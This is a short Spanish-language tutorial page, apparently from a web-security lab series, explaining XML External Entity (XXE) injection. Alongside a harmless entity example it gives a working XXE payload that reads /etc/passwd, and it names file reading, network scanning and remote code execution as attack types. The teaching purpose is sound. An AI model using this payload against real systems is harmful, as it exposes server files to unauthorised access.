¿XML external entity?
¿Qué es la Inyección de Entidades Externas XML (XXE)?
¿Cómo Funciona la Inyección de Entidades Externas XML?
Ejemplo de un Documento XML Vulnerable
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY test "Hello, world!">
]>
<root>&test;</root><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>Tipos de Ataques XXE
Lectura de Archivos Locales
Scanning de Red
Ejecución de Código Remoto
AnteriorLab 3: File path traversal, traversal sequences stripped non-recursivelySiguienteLab 1: Exploiting XXE using external entities to retrieve files
Última actualización